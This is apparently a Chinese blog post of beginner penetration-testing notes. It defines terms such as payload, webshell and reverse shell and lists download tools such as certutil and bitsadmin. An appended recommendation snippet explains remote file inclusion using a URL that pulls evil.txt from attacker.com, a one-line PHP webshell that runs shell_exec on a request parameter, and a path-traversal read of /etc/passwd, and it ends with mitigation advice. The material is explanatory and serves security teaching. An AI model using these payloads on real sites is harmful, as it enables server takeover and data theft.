1、基础入门——操作系统&文件下载&反弹SHELL&防火墙绕过

名词解释

  • POC:验证漏洞存在的代码;

  • EXP:利用漏洞的代码;

  • payload:漏洞利用载荷。

    常规情况下用exp攻破了系统,需要与靶机进行通信,以便操纵靶机,一般用反弹shell,这个反弹shell的代码就是payload.

  • shellcode:漏洞代码,

  • webshell:特指网站后门;

  • 木马:强调控制电脑

  • 病毒:破坏性程序;

  • 反弹shell:将权限反弹到其他机器上;

  • 跳板:中介

  • 黑盒测试:没有代码,不知目标情况;

  • 白盒测试:知道代码

  • 社会工程学:“社工”

  • 撞库:从泄露的数据库(社工库)中获取想要的信息;

  • ATT&CK:红蓝对抗框架,MITRE ATT&CK®

渗透测试常用术语总结 - 11阳光 - 博客园 (cnblogs.com)

基础案例1:操作系统——命令&权限&用户&防火墙

1、windows&linux常见命令

【3】web安全入门篇-渗透测试中常用的命令-CSDN博客

2、权限

分为:文件权限、服务权限、用户权限
windows下:administrators代表管理员组,组权限优先于用户权限。

3、防火墙

自带防火墙:对出站基本上没检测,对入站检测很严格。
WAF:web层面的防火墙。

实用案例1:文件上传下载——解决无图形化&解决数据传输

目的:

  1. 解决无图形化:就是说在没有图形化界面时,需要使用命令行进行文件上传与下载;
  2. 解决数据传输:进行文件上传与下载的目的是为了上传/下载shell,建立攻击机与靶机之间的通讯。

相关命令

linux:wget、curl、python、ruby...
windows:powershell、certutil、bitsadmin...

实用案例2:反弹shell——解决数据回显&解决数据通讯

目的:

  1. 数据回显:输出命令执行过程中的信息;
  2. 数据通信:

在NAT模式下,VMnet8充当主机与虚拟机之间信息交换的桥梁,启用VMnet8,主机和虚拟机之间是可以互ping的。
![[Pasted image 20231117145845.png]]

禁用VMnet8,虚拟机处在内网环境下,虚拟机可以ping通主机,主机ping不通虚拟机。
在这里插入图片描述

端口转发与端口映射

正向连接和反向连接:以本机为基准,本机连接虚拟机,属于正向连接;虚拟机连接本机,属于反向连接。

渗透测试资源:棱角社区

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
远程文件包含(Remote File Inclusion,RFI)和服务器端文件包含(Server Side Include,SSI)是常见的Web应用程序漏洞,攻击者通过利用这些漏洞可以获取网站服务器上的敏感信息,甚至控制整个服务器。下面我来介绍一下这两种漏洞。 一、远程文件包含 远程文件包含是指攻击者通过Web应用程序加载远程托管的文件,这些文件可能包含恶意代码,攻击者可以利用这些代码执行各种攻击,例如窃取敏感信息、控制服务器等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载远程的evil.txt文件,并执行其中的代码。攻击者可以在evil.txt中写入任意的PHP代码,例如: ``` <?php echo shell_exec($_GET['cmd']); ?> ``` 这段代码会执行用户传入的cmd参数,并将结果输出,攻击者可以通过以下URL执行任意的系统命令: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt&cmd=ls%20-la ``` 二、服务器端文件包含 服务器端文件包含是指Web应用程序在处理动态内容时,将用户输入作为文件名或路径名进行处理,攻击者可以利用这个漏洞访问其他文件中的代码,例如配置文件、用户数据等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=../../../etc/passwd ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载/etc/passwd文件,并将其中的内容输出到页面上,攻击者可以通过这种方式获取敏感信息。 总结 要防止远程文件包含和服务器端文件包含漏洞,应该对所有用户输入进行过滤和验证,避免用户输入作为文件名或路径名进行处理。应用程序应该使用白名单机制,仅允许访问特定目录下的文件,而不是允许任意文件的访问。此外,应用程序应该启用PHP的安全模式,禁止执行外部命令、禁止访问网络等操作,以提高安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值